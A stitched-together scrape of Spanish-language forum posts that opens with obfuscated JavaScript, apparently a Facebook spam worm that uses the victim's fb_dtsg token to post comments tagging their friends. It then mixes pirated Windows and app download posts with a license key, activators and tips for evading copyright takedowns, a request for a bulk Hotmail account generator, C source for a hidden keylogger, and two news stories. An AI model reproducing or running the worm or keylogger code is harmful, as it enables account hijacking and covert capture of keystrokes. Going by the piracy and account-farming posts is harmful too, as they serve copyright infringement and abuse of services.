(){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);

https://www.facebook.com/nightmx/pos...omment_mention

Windows XP Sp2 Español [Autoactivado] [32 bits - 64 bits] 1 link

$
0
0
Menos pesado que el WINDOWS 7, puede ser mejor alternativa este sistema operativo en laptops y computadoras de baja capacidad:

Contiene la actualizacion “Service PACK 2″. Una vez instalado, con Actualizaciones Automaticas de Windows pueden instalar las actualizaciones SP3 y SP4 de internet, si tienen suficiente espacio en su disco duro claro!

Requisitos:
-CPU: Procesador Intel Pentium 500Mhz o procesador AMD y todas las marcas posteriores
-Memoria: 256 MB de RAM. -Espacio libre en disco duro: 3GB.
-Incluye archivo de texto con clave de instalacion: RJFWT - PD7GJ - 8QV7B - PGWRC - 9Q34Q
-No requiere activación
-Tamaño: 560 Mb, en 1 Link:

descargar de Depositfiles ........ o ....... Rapidgator........ o ....... Uploaded:
http://depositfiles/ .............. http://rapidgator.net/.............. http://uploaded.to/
(enlaces protegidos, carga publicidad 5 segundos y piquen "SKIP THIS AD" y conducira a la descarga)

Tras descargar, sigan estos pasos:
- Tras descargar el Link, lo descomprimen con winrar (clave: FREE, todo en mayuscula) obteniendo el archivo “DATA.S2K” ...... le cambian el nombre y extension a “DATA.zip” obteniendo asi una carpeta comprimida en zip .... la descomprimen y obtendran la carpeta “DATA” (si gustan cambian el nombre de la carpeta a “WINDOWS XP“)
- Y listo ..... esta carpeta “DATA” o “WINDOWS XP" o como gusten llamarle es la carpeta completa del instalador del WINDOWS XP SP2 ESPAÑOL ..... suerte!
.
.
Disculpen la excesividad de cambios de nombres, extenciones, claves, etc ....es para que el servidor host no descubra que es el instalador del WINDOWS XP, si lo descubre lo borra por violar Derechos de autor

Todo Windows® 8.1 [20 en 1][Enero 2014] [Pre-Activado][64 Bits]

$
0
0

Descargar Todo Windows® 8.1 [20 en 1][Enero 2014] [Pre-Activado] [64 Bits] . Gratis



DESCRIPCION

Todo Windows 8.1 con un total de 20 versiones diferentes en una misma imagen - mirar imagenes de las capturas -
Algunas versiones vienen preactivadas y otras hay que activarlas, como las que pongo en las capturas de la instalacion.
Su instalacion es en ingles pero se puede traducir al idioma que se desee sin problema alguno y sencillamente
Dentro de la descarga viene un conjunto de diversos activadores para todos los Windows
No se afectó en la configuracion en la elaboración de esta norma imagen ISO.
No hay programas agregados a Windows.
No se modifico la configuración del registro
No hay configuración desatendida se añadieron a la ISO.

LO QUE TRAE INSTALADO- Mirar imagenes de las capturas -

* Windows 8.1 (Core) x64 / KMS-Activated
* Windows 8.1 (Core) N x64 / KMS-Activated
* Windows 8.1 (Core) Single Language x64 / KMS-Activated
* Windows 8.1 Pro x64 / KMS-Activated
* Windows 8.1 Pro N x64 / KMS-Activated
* Windows 8.1 Pro with Media Center x64 / KMS-Activated
* Windows 8.1 Pro VL x64 / KMS-Activated
* Windows 8.1 Pro N VL x64 / KMS-Activated
* Windows 8.1 Enterprise x64 / KMS-Activated
* Windows 8.1 Enterprise N x64 / KMS-Activated


PAQUETES AÑADIDOS

KB2862152, KB2868626, KB2876331, KB2884846, KB2892074, KB2893294, KB2893984, KB2898785, KB2899189, KB2900986,
KB2902892, KB2904266, KB2904440, KB2909569, KB2913152, KB2913270, KB2913320, KB2916626, KB2917993, KB2883200,
KB2894029, KB2894179, KB2887595-v2, KB2898514, KB2901101, KB2906956, KB2908174, KB2903939, KB2911134, KB2911106, KB2914218

CARACTERISTICAS DE ESTA VERSION

* No-Activado y los índices de pre-activadas. Lleve a su selección.
* Utiliza la carpeta KMS personalizados en el directorio de Windows. He incluido el script de desinstalación si desea utilizar un activador diferente en el futuro
*Fácilmente el formato de compresión de recuperación install.esd comprimido.
* DaRT 8.1 integrado en las opciones de recuperación Boot.wim.
Seleccione Reparar el equipo, Solución de problemas, entonces las opciones de MS DaRT se abran.
Incluir un defensor a / v escáner fuera de línea, herramienta de restablecimiento de contraseña, editor del registro,
eliminación de revisión fuera de línea, archivo de sistema ortográfico, y muchos más.
* UEFI información de inicio añadido a los datos de arranque ISO
* Todos los índices usan MSDN 9.9 isos Win8.1 originales con las revisiones integradas.
* Esta versión utiliza v6 acumulación KMS servicio de servidor de qad con la funcionalidad integrada de WinDivert Windivert 1.1.1 WDDK.


INFORMACION TECNICA

Nombre: Todo Windows® 8.1
S.O: Windows 8.1
Imagen ISo
Idioma: Ingles - Pero se puede traducir al idioma que se desee de manera muy facil, mirar capturas de instalacion -
Arquitectura: X64 64 Bits
Tamaño: 4.21 Gb la imagen iso + Activadores si fuera necesario
Actualizaciones Enero 2014
Formato archivo. RAR. Una vez descomprimido se convierte en Imagen para Grabar con Nero - UltraIso, Alcohol 120 o similar
Grabar Iso en DVD con cualquier quemador o poner de arranque PentDrive / USB
Medicina incluida


REQUISITOS SISTEMA

* Procesador de 2 GHz o más
* Se recomienda más de 2 Gb de RAM
* Mnitor y tarjeta de vídeo con una resolución de 1024 X 768 o superior y una memoria de 64 MB
* Un mínimo de 16 gigabytes (GB) de espacio disponible en el disco duro
* Unidad de CD-ROM o DVD-ROM



Pincha en imagen para agrandar







Cita:



LOS ENLACES SON INTERCAMBIABLES


Letitibit

Huit300114_64.part4.rar download for free on file share letitbit.net
Huit300114_64.part2.rar download for free on file share letitbit.net
Huit300114_64.part3.rar download for free on file share letitbit.net
Huit300114_64.part5.rar download for free on file share letitbit.net
Huit300114_64.part6.rar download for free on file share letitbit.net
Huit300114_64.part1.rar download for free on file share letitbit.net



Uploaded

Huit300114_64.part6.rar (436,42 MB) - uploaded.net
Huit300114_64.part5.rar (700,00 MB) - uploaded.net
Huit300114_64.part4.rar (700,00 MB) - uploaded.net
Huit300114_64.part3.rar (700,00 MB) - uploaded.net
Huit300114_64.part2.rar (700,00 MB) - uploaded.net
Huit300114_64.part1.rar (700,00 MB) - uploaded.net


FreakShare

FreakShare - Easy One-Click File Hosting
FreakShare - Easy One-Click File Hosting
FreakShare - Easy One-Click File Hosting
FreakShare - Easy One-Click File Hosting
FreakShare - Easy One-Click File Hosting
FreakShare - Easy One-Click File Hosting





Generador de Hotmail.

$
0
0
Buenas.

¿Existe algún generador de correos hotmail y Outlook?
Necesito uno. Tardo mucho tiempo en hacerlos y normalmente tengo que cambiar de IP para saltarme la limitación.

post como evitar abrir mas de una vez una ventana en netbeans


Problema con keylogger en C

$
0
0
Buenas tardes, soy nuevo en el foro y vengo buscando un poco de ayuda. Mi problema es que me han pedido hacer un keylogger en C que lea todo tipo de letras y carácteres especiales. La cuestión es que puedo leer cualquier carácter salvo cuando quiero escribir un carácter que está combinada por más de una tecla. Por ejemplo, quiero escribir el carácter '@', por lo que tendré que utilizar la tecla [Alt Gr] + 2. Soy nuevo en la programación de C, por favor necesito ayuda. Gracias!

Mi código es el siguiente:

------------------------------------------------------------------------


#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <ctype.h>

#define SHIFTED 0x8000
#define TECLA_OK -32767

/* Almacena las teclas en el fichero log */
int key2file(int tecla, char *file)
{
FILE *fd=NULL;

if((tecla ==1) || (tecla == 2))
return 0;

/* Abre fichero */
fd = fopen(file,"a+");
if(fd == NULL)
return 0;

/* Comprueba teclas */
if(tecla == 8)
fprintf(fd,"%s","[DEL]");
else if (tecla == 13)
fprintf(fd,"%s","\n");
else if (tecla == 32)
fprintf(fd,"%s"," ");
else if(tecla == 110 || tecla == 190)
fprintf(fd,"%s",".");
else if(tecla >= 0x2F && tecla <= 0x39)
{
/* Número */
fprintf(fd,"%s",(char *)&tecla);
}
else if(tecla >= 0x41 && tecla <= 0x5A)
{
/* Letra */
fprintf(fd,"%s",(char *)&tecla);
}



/* Impresion de caracteres especiales desde teclado numerico y pulsaciones de Mayusculas y shitf. */

switch(tecla){
case 106 :
{

fprintf(fd,"%s","*");
break;
}

case 107 :
{

fprintf(fd,"%s","+");
break;
}


case 108 :
{

fprintf(fd,"%s","\n");
break;
}
case 109:
{

fprintf(fd,"%s","-");
break;
}

case 110 :
{

fprintf(fd,"%s",".");
break;
}

case 111 :
{

fprintf(fd,"%s","/");
break;
}

case 9 :
{
fprintf(fd,"%s","[Tabulador]");
break;

}

case 20 :
{
fprintf(fd, "%s","[Bloq.Mayus.]");
break;
}

case 0x10 :
{
fprintf(fd, "%s","[Shitf]");
break;
}

case 0x11 :
{
fprintf(fd, "%s","[Ctrl]");
break;
}

case 0x11+0x32 :
{
fprintf(fd, "%s","@");
break;
}





}


fclose(fd);
return 0;
}

int main(void)
{
HWND Handle;
char tecla;

AllocConsole();
Handle = FindWindowA("consoleWindowClass",NULL);
ShowWindow(Handle,0);

/* Bucle de funcionamiento */
for(; ;
{
for(tecla=8; tecla<=190; tecla++)
{
if(GetAsyncKeyState(tecla) == TECLA_OK)
key2file(tecla,"keylog.txt");
}
}



return 0;
}

Android Pack Hard [12 Volumenes][LINKS PREMIUMS]

$
0
0


Pack Hard 2014 es un compilado de las mejores y ultimas versiones de aplicaciones y juegos para Android.

Contenido de todos los volumenes:

http://notepad.cc/share/rcRHYOCUfR




Activado Hybrid traffic en Uploaded (Descarga como Premium Gratis 24 desde la publicacion)

Cada link es un volumen INDEPENDIENTE

Vol1 http://uploaded.net/file/swh2mi6c
Vol2 http://uploaded.net/file/9imq04u6
Vol3 http://uploaded.net/file/3pzxn4of
Vol4 http://uploaded.net/file/tavwu7ml
Vol5 http://uploaded.net/file/fb3ocdt5
Vol6 http://uploaded.net/file/h3r0suc2
Vol7 http://uploaded.net/file/bsbobh2q
Vol8 http://uploaded.net/file/lpiteuzg
Vol9 http://uploaded.net/file/lsuupl0j
Vol10 http://uploaded.net/file/ftz1005l
Vol 11 http://uploaded.net/file/spo9eyj7
Vol12 http://uploaded.net/file/72e0kftj



Disfruta de la descarga ;)

Scania Multi [09.2013] Multilenguaje (Español)(1 link)

$
0
0
Scania Multi [09.2013] Multilenguaje (Español)






SCANIA Multi [09.2013] Multilenguaje (Español) | 7.08 GB | 1 GB Links


SCANIA MULTI contiene informacion sobre las piezas de repuesto para coches y autobuses Scania. Toda la informacion se presenta desde 1985 para los camiones chasis P-, G-, R-, T-, autobuses 3, 4, 5 y las series F-, K-, N-, para todas las regiones. Contiene tiempos de reparacion y manuales.




- S.O.: Windows XP; Windows Vista; Windows 7; Windows 8
- CPU: Pentium/Athlon 1.8 GHz o superior
- RAM: 256 MB de memoria del sistema
- Disco Duro: 10 GB de espacio disponible
- Unidad de DVD-ROM





Compre Premium Desde Enlaces & Obtenga Descargas Reanudables & Máxima Velocidad !!

Descargar

http://shareflare.net/download/22413...part6.rar.html
http://shareflare.net/download/00247...part7.rar.html
http://shareflare.net/download/20019...part8.rar.html
http://shareflare.net/download/57638...part5.rar.html
http://shareflare.net/download/05765...part3.rar.html
http://shareflare.net/download/32196...part4.rar.html
http://shareflare.net/download/37273...part2.rar.html
http://shareflare.net/download/83412...part1.rar.html

Windows® 8 UnderGround [Pre-Activado] [64 Bits]

$
0
0

Descargar Windows® 8 UnderGround [Pre-Activado] [64 Bits] . Gratis



DESCRIPCION

Windows 8 Underground***es sistema operativo basado en***Windows 8 Pro 64-Bit Original.
Especializado para gamers y usuarios domésticos convencionales. El sistema fue codificado y optimizado al máximo nivel.
Es más cómodo, rápido y fiable a comparación de cualquiera de las otras ediciones de Windows 8.
Incluye la opción de instalar una gran cantidad de software, indispensables para tu PC y además cuenta con una gran cantidad de drivers para asegurar la máxima compatibilidad con tu sistema.
Instalacion en ingles pero se puede traducir al español o cualquier idioma de manera sencilla.
NOTA IMPORTANTE: NO instalar la actualización***WINDOWS 6.0 KB2770917***o el sistema sera bloqueado. Este es un error de Windows 8.

CARACTERISTICAS DE ESTA VERSION

* Nuevos tema, sonidos e iconos en alta resolución
* Nueva música de muestra
* Wallpapers en alta calidad
* Removido ATI obsoleto
* Controladores de tarjeta gráfica NVIDIA e Intel ***actualizados
* Actualizado DirectX
* Se solucionaron muchos de los problemas al iniciar Windows 8
* Tiene pleno soporte para juegos en Alta Definición

[]bControladores integrados[/b]

ATI Radeon HD 5000 Series
ATI Radeon HD 6000 Series
ATI Radeon HD 7000 Series
ATI FirePro Series
2nd Generation Intel® Core™ Processors with Intel® HD Graphics 2000
2nd Generation Intel® Core™ Processors with Intel® HD Graphics 3000
3rd Generation Intel® Core™ Processors with Intel® HD Graphics 2500
3rd Generation Intel® Core™ Processors with Intel® HD Graphics 4000
NVIDIA GeForce GTX 690
NVIDIA GeForce GTX 680
NVIDIA GeForce GTX 670
NVIDIA GeForce GTX 660 Ti
NVIDIA GeForce GTX 660
NVIDIA GeForce GTX 650 Ti
NVIDIA GeForce GTX 650
NVIDIA GeForce GT 645
NVIDIA GeForce GT 640
NVIDIA GeForce GT 630
NVIDIA GeForce GT 620
NVIDIA GeForce GT 610
NVIDIA GeForce GT 605
NVIDIA GeForce GTX 590
NVIDIA GeForce GTX 580
NVIDIA GeForce GTX 570
NVIDIA GeForce GTX 560 Ti
NVIDIA GeForce GTX 560 SE
NVIDIA GeForce GTX 560
NVIDIA GeForce GTX 555
NVIDIA GeForce GTX 550 Ti
NVIDIA GeForce GT 545
NVIDIA GeForce GT 530
NVIDIA GeForce GT 520
NVIDIA GeForce 510
NVIDIA GeForce GTX 480
NVIDIA GeForce GTX 470
NVIDIA GeForce GTX 465
NVIDIA GeForce GTX 460 v2
NVIDIA GeForce GTX 460 SE v2
NVIDIA GeForce GTX 460 SE
NVIDIA GeForce GTX 460
NVIDIA GeForce GTS 450
NVIDIA GeForce GT 440
NVIDIA GeForce GT 430
NVIDIA GeForce GT 420
NVIDIA GeForce 405
NVIDIA GeForce GT 340
NVIDIA GeForce GT 330
NVIDIA GeForce GT 320
NVIDIA GeForce 315
NVIDIA GeForce 310
NVIDIA GeForce GTX 295
NVIDIA GeForce GTX 285
NVIDIA GeForce GTX 280
NVIDIA GeForce GTX 275
NVIDIA GeForce GTX 260
NVIDIA GeForce GTS 250
NVIDIA GeForce GTS 240
NVIDIA GeForce GT 240
NVIDIA GeForce GT 230
NVIDIA GeForce GT 220
NVIDIA GeForce G210
NVIDIA GeForce 210
NVIDIA GeForce 205
NVIDIA GeForce GT 140
NVIDIA GeForce GT 130
NVIDIA GeForce GT 120
NVIDIA GeForce G 100
NVIDIA GeForce 9800 GX2
NVIDIA GeForce 9800 GTX/GTX+
NVIDIA GeForce 9800 GT
NVIDIA GeForce 9600 GT
NVIDIA GeForce 9600 GSO
NVIDIA GeForce 9600 GS
NVIDIA GeForce 9500 GT
NVIDIA GeForce 9500 GS
NVIDIA GeForce 9400 GT
NVIDIA GeForce 9400
NVIDIA GeForce 9300 GS
NVIDIA GeForce 9300 GE
NVIDIA GeForce 9300
NVIDIA GeForce 9200
NVIDIA GeForce 9100
NVIDIA GeForce 8800 Ultra
NVIDIA GeForce 8800 GTX
NVIDIA GeForce 8800 GTS 512
NVIDIA GeForce 8800 GTS
NVIDIA GeForce 8800 GT
NVIDIA GeForce 8800 GS
NVIDIA GeForce 8600 GTS
NVIDIA GeForce 8600 GT
NVIDIA GeForce 8600 GS
NVIDIA GeForce 8500 GT
NVIDIA GeForce 8400 SE
NVIDIA GeForce 8400 GS
NVIDIA GeForce 8400
NVIDIA GeForce 8300 GS
NVIDIA GeForce 8300
NVIDIA GeForce 8200 / nForce 730a
NVIDIA GeForce 8200
NVIDIA GeForce 8100 / nForce 720a

Programas incluidos

7-Zip
WinRAR
CDBurnerXP
Mozilla Firefox
K-Lite Mega Codec Package
Adobe Flash Player
Notepad ++
Internet Download Manager
Java Runtime Environment
CCleaner Bussines Edition
RocketDock
VLC Media Player
TuneUp Utilities 2013
MalwareBytes Anti-Malware
StartIsBack


INFORMACION TECNICA

Nombre: Windows® 8 Underground
S.O: Windows 8 pro
Imagen ISo
Idioma: Ingles - Pero se puede traducir al idioma que se desee de manera muy facil, mirar capturas de instalacion -
Arquitectura: X64 64 Bits
Tamaño: 4.4 Gb la imagen iso + Activadores si fuera necesario
Formato archivo. RAR. Una vez descomprimido se convierte en Imagen para Grabar con Nero - UltraIso, Alcohol 120 o similar
Grabar Iso en DVD con cualquier quemador o poner de arranque PentDrive / USB
Medicina incluida - Aunque no es necesario, ya viene activado -


REQUISITOS SISTEMA

* Procesador de 2 GHz o más
* Se recomienda más de 2 Gb de RAM
* Monitor y tarjeta de vídeo con una resolución de 1024 X 768 o superior y una memoria de 64 MB
* Un mínimo de 20 gigabytes (GB) de espacio disponible en el disco duro
* Unidad de CD-ROM o DVD-ROM



Pincha en imagen para agrandar







Cita:



LOS ENLACES SON INTERCAMBIABLES


Letitibit

Huit310114_64.part4.rar download for free on file share letitbit.net
Huit310114_64.part2.rar download for free on file share letitbit.net
Huit310114_64.part5.rar download for free on file share letitbit.net
Huit310114_64.part6.rar download for free on file share letitbit.net
Huit310114_64.part3.rar download for free on file share letitbit.net
Huit310114_64.part1.rar download for free on file share letitbit.net




Uploaded

Huit310114_64.part6.rar (604,53 MB) - uploaded.net
Huit310114_64.part5.rar (700,00 MB) - uploaded.net
Huit310114_64.part4.rar (700,00 MB) - uploaded.net
Huit310114_64.part3.rar (700,00 MB) - uploaded.net
Huit310114_64.part2.rar (700,00 MB) - uploaded.net
Huit310114_64.part1.rar (700,00 MB) - uploaded.net


FreakShare

FreakShare - Easy One-Click File Hosting
FreakShare - Easy One-Click File Hosting
FreakShare - Easy One-Click File Hosting
FreakShare - Easy One-Click File Hosting
FreakShare - Easy One-Click File Hosting
FreakShare - Easy One-Click File Hosting





Un matemático hackea un portal de citas para encontrar el amor de su vida

$
0
0
Aunque parezca un juego de palabras o un titular de broma, la historia de Chris McKinlay ha sido publicada, con todo lujo de detalles, en la revista Wired, y ya corre como la pólvora por las redes sociales. Este matemático de la Universidad de California y Los Ángeles (UCLA) hackeó el portal de citas OkCupid, muy popular en Estados Unidos, para encontrar a chicas que se parecieran a su media naranja.

Nueve meses después de una ruptura sentimental, McKinlay comprobaba con frustración, día tras día, que casi ninguno de los mensajes que escribía a las usuarias de OkCupid que llamaban su atención obtenían respuesta, y que las pocas citas que lograba concertar a través del portal siempre fallaban. En lugar de desanimarse, y convencido de que tenía que existir una chica para él en su misma ciudad, Los Ángeles, se puso manos a la obra.

De manera bastante lúcida, McKinlay tuvo claro, casi desde el principio, que lo único que necesitaba para encontrar a su media naranja era un perfil completado con la información idónea, es decir, que resultase atractivo. OkCupid pide a sus usuarios que rellenen su información contestando a un mínimo de 350 preguntas, escogidas de entre miles de ellas. Parte del cortejo en la plataforma se da, precisamente, comprobando qué han respondido los demás perfiles a las preguntas, pero cada usuario tiene acceso únicamente a las respuestas que otros usuarios han dado a preguntas que él también haya respondido.

McKinlay sospechaba que las preguntas con las que él completaba su perfil no eran de las más populares entre las mujeres con las que le interesaba salir, así que lo primero que necesitaba para lograr su meta era saber qué preguntas eran las más respondidas y, por tanto, a cuáles debía dar mayor importancia él mismo en su perfil.

Para ello, creó 12 cuentas falsas de OkCupid que él mismo se encargó de coordinar para la búsqueda de información en perfiles femeninos de entre 25 y 45 años. Con ellas se encargó de responder aleatoriamente a todas y cada una de las preguntas, para así poder leer las contestaciones de los perfiles femeninos. Pero OkCupid cuenta con un mecanismo de seguridad anti-hackers que detectó un comportamiento anormal en las cuentas de McKinlay y, cuando éste ya había recopilado información de unos mil perfiles, éstas fueron eliminadas.

El matemático, lejos de darse por vencido, le pidió ayuda a un amigo, que también tenía cuenta en OkCupid, y cuyo ordenador fue hackeado por McKinlay con spyware para controlar y copiar sus patrones de escritura y de clics. McKinlay creó, entonces, nuevas cuentas falsas y las programó para que escribieran y clicaran a la misma velocidad que su amigo, es decir, que un humano, y así no fueran detectadas como bots.

Funcionó, y en tres semanas había recopilado seis millones de respuestas de mujeres distintas, que entonces se dedicó a clasificar y categorizar para facilitar su búsqueda. De todos los tipos de mujeres que estableció en su base de datos, los que más le interesaron fueron el de chicas indie de veintitantos con profesiones e intereses artísticos y el de mujeres algo más mayores con profesiones creativas.

Aprendió, gracias a los datos recabados, qué era lo que más interesaba a ambos sectores de mujeres y configuró dos nuevos perfiles, uno con una foto en la que aparecía tocando la guitarra y otro con un avatar en el que estaba escalando, respondiendo a las 500 preguntas más respondidas por esos dos tipos de chicas.

La cosa mejoró notablemente: además de obtener muchísimos más resultados de posibles parejas en su ciudad que congeniaban con él hasta en un 99%, después de crear un software especial para visitar sus perfiles a más velocidad (OkCupid notifica a sus usuarios de quién visita su perfil, para que puedan ponerse en contacto con él), McKinlay empezó a recibir mensajes. Muchos mensajes. Y después llegaron las citas.

Evidentemente, no estaba todo hecho. El amor “también va de hackear”, explica McKinlay, de piratear nuestros defectos y los de nuestras parejas o aprender a convivir con ellos. Después de 88 citas y de comprobar que la categoría de artistas indie no cuadraba demasiado con él, McKinlay quedó por primera vez con Christine Tien Wang, con una compatibilidad, según OkCupid, del 91%, y que sigue siendo, un año después, su pareja. Ella conoce la aventurahacker de su novio en busca del amor, y ambos planean casarse en un futuro próximo.

“Lo que he hecho no es más que una versión con algoritmos y ordenadores de lo que cualquier usuario hace en un sitio de ese tipo”, reflexiona ahora, McKinlay.


Fuente:cyborgcultura

WhatsApp, la nueva forma de difundir noticias falsas y estafar a las personas

$
0
0
Si usted conduce de noche y ve un vehículo sin las luces encendidas, no le avise”, se trata de un “juego de sangre” de aspirantes a entrar en una banda que deben agredir a la primera persona que les advierta. Éste es uno de los bulos que circulan en los últimos días por WhatsApp. El texto incluso alerta de que “este próximo fin de semana” será de “iniciación” y pide a los ciudadanos que tomen precauciones, adviertan a sus familiares e incluso que contacten con el 062 o el 112.

Se trata de una antigua leyenda urbana que se suma a otras informaciones falsas recibidas por los usuarios de este servicio de mensajería, cuyo efecto es mayor en municipios pequeños, donde llegan a casi todos los habitantes y generan “alarma social”. Es el caso de Calamonte, una localidad extremeña de poco más de 6.000 habitantes, cuyos vecinos han recibido esta semana un mensaje que alerta de la presencia de varios delincuentes por la zona que han escapado de prisión e incluso indica que la noticia ha sido transmitida por medios locales y el ayuntamiento. La noticia es “falsa totalmente”, señala la teniente de alcalde de este municipio, Magdalena Carmona, quien asegura que la información ha generado “alarma social” y “desconfianza”.

“Se aprovechan de las nuevas tecnologías” y le dan un uso “inadecuado”, añade uno de los responsables de la radio local, quien desmiente que se haya informado de esta falsa noticia.
Policía Nacional

La Policía Nacional a través de su perfil en Twitter ha desmentido bulos como el secuestro de niños en Sevilla o el supuesto violador en una zona de Madrid, un mensaje que incluye una fotografía y que los agentes instan a no reenviar para no “hundir la vida del inocente chaval”.

Cada día aparece una nueva mentira, como la que informa de ladrones en aparcamientos que colocan papeles en los vehículos y aprovechan el descuido de los conductores cuando van a retirarlos para robar el coche, según explica el responsable de Comunicación de la Policía Nacional en Extremadura, Juan Manuel de la Cruz.

Para diferenciar si se trata de un bulo, De la Cruz recuerda que la Policía no informa a particulares a través de servicios como el WhatsApp, sino que utiliza los medios de comunicación y sus canales oficiales. “Aplicando la lógica se puede discernir que se trata de bulos, por lo que se apela a la conciencia de cada uno”, afirma, al tiempo que señala que si se sospecha de que el mensaje puede ser falso se contacte con el 091.
Fraude por mensajes

Otros mensajes van más allá y buscan estafar a los ciudadanos. “Los listos del día: intentan que llames a un teléfono de alto coste y hablar así de un amigo. ¡No llames! FRAUDE”, advierte la Policía en Twitter.

La organización de consumidores Facua ha denunciado a cuatro empresas por cometer fraude masivo al enviar mensajes que incitan a responder al simular ser un contacto de WhatsApp. Se busca que la operadora cargue al usuario elevadas cantidades en el recibo de su teléfono, ya que se trata de un servicio Premium. Enrique Piñero es miembro del gabinete Jurídico de Facua y explica que si no se ha contestado a ellos es preciso identificar a la empresa y denunciar este hecho ante la Agencia Española de Protección de Datos.

Aquellos que ya hayan respondido deben exigir a su compañía que no les cargue su coste y presentar denuncias ante la Oficina de Atención al Usuario de Telecomunicaciones y la autoridad de consumo de su región. Piñero aconseja desconfiar de mensajes recibidos de números “sospechosos” y cuestionar la veracidad de aquellos cuyo contenido incluso está redactado con faltas de ortografía. Frenar la proliferación de este tipo de mensajes no parece fácil, Policía y consumidores apuntan a la concienciación y el sentido común como herramientas para combatir las mentiras y estafas de los nuevos troleros y pícaros del WhatsApp.


Fuente: 20minutos

New iPhone/iPod/iPad/MAC Apps + Game Collection 2014

$
0
0



0-9
1500 Ringtones Unlimited - Download free music, sound effects, funny ringtones and caller ID tones | Entertainment | $0.99 | 7.1
Código:

http://ul.to/85xerhvo
3D Rollercoaster Rush | Game | $0.99 | 1.1.14
Código:

http://ul.to/5j17us32
60Hz for iPhone - Series and Movie Tracker | Entertainment | 3.0.1
Código:

http://ul.to/1cdtunv8
9th Dawn | Game | 1.6.2
Código:

http://ul.to/878gbvni

A
Abalone® | Game | $2.99 | 1.0.8
Código:

http://ul.to/fgfp16ar
ABBYY Business Card Reader | Business | $4.99 | 6.8
Código:

http://ul.to/49u02vtu
AcePlayer -Powerful Media Player | Music | 3.3
Código:

http://ul.to/fh3bs5of
Adding Apples HD | Education | 1.2
Código:

http://ul.to/a43l0m4f
Adobe Dreamweaver CC 13.2 Build 6466 | MAC | Free | 13.2 Build 6466
Código:

http://ul.to/owo6dy6r
Adrian James 6 Pack Abs Workout | Health & Fitness | $1.99 | 4.0.1
Código:

http://ul.to/yi5s011o
AeroWeather Pro | Weather | $3.99 | 1.6.1
Código:

http://ul.to/nggy35pj
Age of Booty: Tactics | Game | Free | 1.1.1
Código:

http://ul.to/sqs0ky4w
AgingBooth | Entertainment | $0.99 | 3.7
Código:

http://ul.to/52g2zjmy
Air Pic - Levitation Camera + Photo Filters and Picsart Effects | Entertainment | $2.99 | 1.0.2
Código:

http://ul.to/27s2dpfy
Air-Photos | Utilities | $4.19 | 3.0.1
Código:

http://ul.to/lcbqppxk
Alien Shooter - Survive | Game | $0.99 | 1.1.1
Código:

http://ul.to/hei8spje
AlwaysOnPC Virtual Desktop PC and Open Office Suite compatible with Google Docs, Microsoft Powerpoint, Word & Excel and Dropbox – Secure VPN Encrypted Edition for iPhone | Productivity | 2.0.5
Código:

http://ul.to/zu2wjnss
Amazing MineSweeper HD | Game | $0.99 | 1.3
Código:

http://ul.to/d4j4age4
Antivirus Pro | Game | 3.1
Código:

http://ul.to/8ci0n3me
AnyPlayerAD | Utilities | $0.99 | 1.4.0
Código:

http://ul.to/bvr5ar2i
Angry Birds | Game | $0.99 | 4.0.0
Código:

http://ul.to/nax3byx6
Angry Birds Rio | Game | Free | 1.8.0
Código:

http://ul.to/r7qhe3rn
Angry Birds Space | Game | $0.99 | 1.6.9
Código:

http://ul.to/3ggl0z1l
